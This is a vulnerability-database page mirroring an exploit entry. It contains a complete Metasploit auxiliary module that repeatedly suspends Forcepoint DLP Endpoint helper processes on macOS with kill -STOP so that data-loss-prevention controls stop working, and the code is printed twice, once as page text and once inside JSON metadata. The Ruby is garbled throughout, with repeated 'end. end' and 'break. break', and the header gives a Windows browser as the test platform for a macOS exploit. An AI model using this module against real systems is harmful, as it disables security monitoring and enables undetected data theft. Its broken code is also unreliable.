📄 Forcepoint One Endpoint macOS 25.08.5008 Forcepoint DLP Endpoint Process...

Description

This Metasploit auxiliary module targets Forcepoint Data Loss Prevention DLP Endpoint on macOS and attempts to manipulate or suspend related security processes...

Visit Original Source

Basic Information

ID PACKETSTORM:219672

Published Apr 23, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Forcepoint One Endpoint macOS 25.08.5008 Forcepoint DLP Endpoint Process Suspension Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.forcepoint.com/ |
==================================================================================================================================

[+] Summary : This Metasploit auxiliary module targets Forcepoint Data Loss Prevention (DLP) Endpoint on macOS and attempts to manipulate or suspend related security processes.

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
##

class MetasploitModule < Msf::Auxiliary
include Msf::Post::File
include Msf::Post::Common
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Forcepoint DLP Endpoint for macOS Process Suspension Bypass',
'Description' => %q{...},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'Platform' => ['osx'],
'Arch' => [ARCH_X64, ARCH_ARM64],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['macOS (Safari + Forcepoint DLP)', {}]],
'DefaultTarget' => 0,
'Actions' => [
['START', { 'Description' => 'Start bypass' }],
['STOP', { 'Description' => 'Stop bypass' }],
['CHECK', { 'Description' => 'Check target' }]
],
'DefaultAction' => 'START'
)
)

register_options([
OptInt.new('SCAN_INTERVAL', [true, 'Interval in seconds between scans', 1]),
OptBool.new('BACKGROUND', [true, 'Run in background', true]),
OptString.new('TARGET_PROCESSES', [true, 'Processes',
'Websense Endpoint Helper,SafariExtension,ForcepointExtensions,com.forcepoint.dlp.safari,SafariContentBlocker'])
])
end. end

def run
case action.name
when 'CHECK'
check_vulnerability
when 'START'
start_bypass
when 'STOP'
stop_bypass
else
print_error("Invalid action: #{action.name}")
end. end
end. end

def check_vulnerability
print_status("Checking for Forcepoint DLP...")

wsdlpd = cmd_exec("pgrep -x wsdlpd").to_s.strip
if wsdlpd. empty?
print_error("wsdlpd not found")
return Exploit::CheckCode::Safe
end. end

print_good("wsdlpd found (PID: #{wsdlpd})")

uid = cmd_exec("id -u").to_s.strip.to_i

unless uid == 0
test_pid = wsdlpd.split.first
result = cmd_exec("kill -STOP #{test_pid} 2>&1").to_s

if result.include?("Operation not permitted")
print_good("wsdlpd protected (EPERM)")
end. end

cmd_exec("kill -CONT #{test_pid} 2>&1")
end. end

targets = datastore['TARGET_PROCESSES'].to_s.split(',')
found_helpers = []

targets. each do |proc|
result = cmd_exec("pgrep -f '#{proc.strip}'").to_s.strip
unless result. empty?
found_helpers << proc. strip
print_good("Found: #{proc.strip} (PID: #{result})")
end. end
end. end

if found_helpers. empty?
print_warning("No helper processes found")
return Exploit::CheckCode::Detected
end. end

print_good("Target appears vulnerable")
Exploit::CheckCode::Appears
end. end

def start_bypass
print_status("Starting bypass...")

return unless check_vulnerability == Exploit::CheckCode::Appears

if datastore['BACKGROUND']
@bypass_thread = framework.threads.spawn("ForcepointBypass", false) do
bypass_loop
end. end
print_good("Running in background")
else
bypass_loop
end. end
end. end

def bypass_loop
targets = datastore['TARGET_PROCESSES'].to_s.split(',')
my_uid = cmd_exec("id -u").to_s.strip.to_i
my_pid = Process.pid # FIX: Replace echo $$

loop do
begin
ps_output = cmd_exec("ps -ax -o pid=,uid=,comm=").to_s

ps_output.each_line do |line|
parts = line.strip.split(/\s+/, 3)
next if parts.length < 3

pid = parts[0]. to_i
uid = parts[1]. to_i
comm = parts[2].to_s

next if pid == my_pid

targets.each do |target|
next unless comm.downcase.include?(target.strip.downcase)

if uid == my_uid
result = cmd_exec("kill -STOP #{pid} 2>&1").to_s
print_good("Suspended #{pid} (#{comm})") if result. empty?
end. end
end. end
end. end

sleep(datastore['SCAN_INTERVAL'].to_i)
rescue => e
print_error("Loop error: #{e}")
break. break
end. end
end. end
end. end

def stop_bypass
print_status("Stopping bypass...")

if @bypass_thread && @bypass_thread.alive?
@bypass_thread.kill
end. end

targets = datastore['TARGET_PROCESSES'].to_s.split(',')
resumed = 0

targets.each do |target|
pids = cmd_exec("pgrep -f '#{target.strip}'").to_s.strip
next if pids. empty?

pids.split.each do |pid|
result = cmd_exec("kill -CONT #{pid} 2>&1").to_s
if result. empty?
resumed += 1
print_good("Resumed #{pid}")
end. end
end. end
end. end

print_good("Resumed #{resumed} processes")
end. end
end. end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-23T16:47:48",
    "description": "This Metasploit auxiliary module targets Forcepoint Data Loss Prevention DLP Endpoint on macOS and attempts to manipulate or suspend related security processes...",
    "published": "2026-04-23T00:00:00",
    "modified": "2026-04-23T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Forcepoint One Endpoint macOS 25.08.5008 Forcepoint DLP Endpoint Process Suspension Bypass",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219672",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : Forcepoint One Endpoint macOS 25.08.5008 Forcepoint DLP Endpoint Process Suspension Bypass                       |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.forcepoint.com/                                                                                      |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Metasploit auxiliary module targets Forcepoint Data Loss Prevention (DLP) Endpoint on macOS and attempts to manipulate or suspend related security processes.\n    \n    \n    [+] POC        :  \n    \n    ##\n    # This module requires Metasploit: https://metasploit.com/download\n    ##\n    \n    class MetasploitModule < Msf::Auxiliary \n    include Msf::Post::File \n    include Msf::Post::Common \n    include Msf::Auxiliary::Report \n    \n    def initialize(info = {}) \n    super( \n    update_info( \n    info, \n    'Name' => 'Forcepoint DLP Endpoint for macOS Process Suspension Bypass', \n    'Description' => %q{...}, \n    'Author' => ['indoushka'], \n    'License' => MSF_LICENSE, \n    'Platform' => ['osx'], \n    'Arch' => [ARCH_X64, ARCH_ARM64], \n    'SessionTypes' => ['shell', 'meterpreter'], \n    'Targets' => [['macOS (Safari + Forcepoint DLP)', {}]], \n    'DefaultTarget' => 0, \n    'Actions' => [ \n    ['START', { 'Description' => 'Start bypass' }], \n    ['STOP', { 'Description' => 'Stop bypass' }], \n    ['CHECK', { 'Description' => 'Check target' }] \n    ], \n    'DefaultAction' => 'START' \n    ) \n    ) \n    \n    register_options([ \n    OptInt.new('SCAN_INTERVAL', [true, 'Interval in seconds between scans', 1]), \n    OptBool.new('BACKGROUND', [true, 'Run in background', true]), \n    OptString.new('TARGET_PROCESSES', [true, 'Processes', \n    'Websense Endpoint Helper,SafariExtension,ForcepointExtensions,com.forcepoint.dlp.safari,SafariContentBlocker']) \n    ]) \n    end. end \n    \n    def run \n    case action.name \n    when 'CHECK' \n    check_vulnerability \n    when 'START' \n    start_bypass \n    when 'STOP' \n    stop_bypass \n    else \n    print_error(\"Invalid action: #{action.name}\") \n    end. end \n    end. end \n    \n    def check_vulnerability \n    print_status(\"Checking for Forcepoint DLP...\") \n    \n    wsdlpd = cmd_exec(\"pgrep -x wsdlpd\").to_s.strip \n    if wsdlpd. empty? \n    print_error(\"wsdlpd not found\") \n    return Exploit::CheckCode::Safe \n    end. end \n    \n    print_good(\"wsdlpd found (PID: #{wsdlpd})\") \n    \n    uid = cmd_exec(\"id -u\").to_s.strip.to_i \n    \n    unless uid == 0 \n    test_pid = wsdlpd.split.first \n    result = cmd_exec(\"kill -STOP #{test_pid} 2>&1\").to_s \n    \n    if result.include?(\"Operation not permitted\") \n    print_good(\"wsdlpd protected (EPERM)\") \n    end. end \n    \n    cmd_exec(\"kill -CONT #{test_pid} 2>&1\") \n    end. end \n    \n    targets = datastore['TARGET_PROCESSES'].to_s.split(',') \n    found_helpers = [] \n    \n    targets. each do |proc| \n    result = cmd_exec(\"pgrep -f '#{proc.strip}'\").to_s.strip \n    unless result. empty? \n    found_helpers << proc. strip \n    print_good(\"Found: #{proc.strip} (PID: #{result})\") \n    end. end \n    end. end \n    \n    if found_helpers. empty? \n    print_warning(\"No helper processes found\") \n    return Exploit::CheckCode::Detected \n    end. end \n    \n    print_good(\"Target appears vulnerable\") \n    Exploit::CheckCode::Appears \n    end. end \n    \n    def start_bypass \n    print_status(\"Starting bypass...\") \n    \n    return unless check_vulnerability == Exploit::CheckCode::Appears \n    \n    if datastore['BACKGROUND'] \n    @bypass_thread = framework.threads.spawn(\"ForcepointBypass\", false) do \n    bypass_loop \n    end. end \n    print_good(\"Running in background\") \n    else \n    bypass_loop \n    end. end \n    end. end \n    \n    def bypass_loop \n    targets = datastore['TARGET_PROCESSES'].to_s.split(',') \n    my_uid = cmd_exec(\"id -u\").to_s.strip.to_i \n    my_pid = Process.pid # FIX: Replace echo $$ \n    \n    loop do \n    begin \n    ps_output = cmd_exec(\"ps -ax -o pid=,uid=,comm=\").to_s \n    \n    ps_output.each_line do |line| \n    parts = line.strip.split(/\\s+/, 3) \n    next if parts.length < 3 \n    \n    pid = parts[0]. to_i \n    uid = parts[1]. to_i \n    comm = parts[2].to_s \n    \n    next if pid == my_pid \n    \n    targets.each do |target| \n    next unless comm.downcase.include?(target.strip.downcase) \n    \n    if uid == my_uid \n    result = cmd_exec(\"kill -STOP #{pid} 2>&1\").to_s \n    print_good(\"Suspended #{pid} (#{comm})\") if result. empty? \n    end. end \n    end. end \n    end. end \n    \n    sleep(datastore['SCAN_INTERVAL'].to_i) \n    rescue => e \n    print_error(\"Loop error: #{e}\") \n    break. break \n    end. end \n    end. end \n    end. end \n    \n    def stop_bypass \n    print_status(\"Stopping bypass...\") \n    \n    if @bypass_thread && @bypass_thread.alive? \n    @bypass_thread.kill \n    end. end \n    \n    targets = datastore['TARGET_PROCESSES'].to_s.split(',') \n    resumed = 0 \n    \n    targets.each do |target| \n    pids = cmd_exec(\"pgrep -f '#{target.strip}'\").to_s.strip \n    next if pids. empty? \n    \n    pids.split.each do |pid| \n    result = cmd_exec(\"kill -CONT #{pid} 2>&1\").to_s \n    if result. empty? \n    resumed += 1 \n    print_good(\"Resumed #{pid}\") \n    end. end \n    end. end \n    end. end \n    \n    print_good(\"Resumed #{resumed} processes\") \n    end. end\n    end. end\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219672",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219672/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Forcepoint One Endpoint macOS 25.08.5008 Forcepoint DLP Endpoint Process Suspension Bypass_PACKETSTORM:219672

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply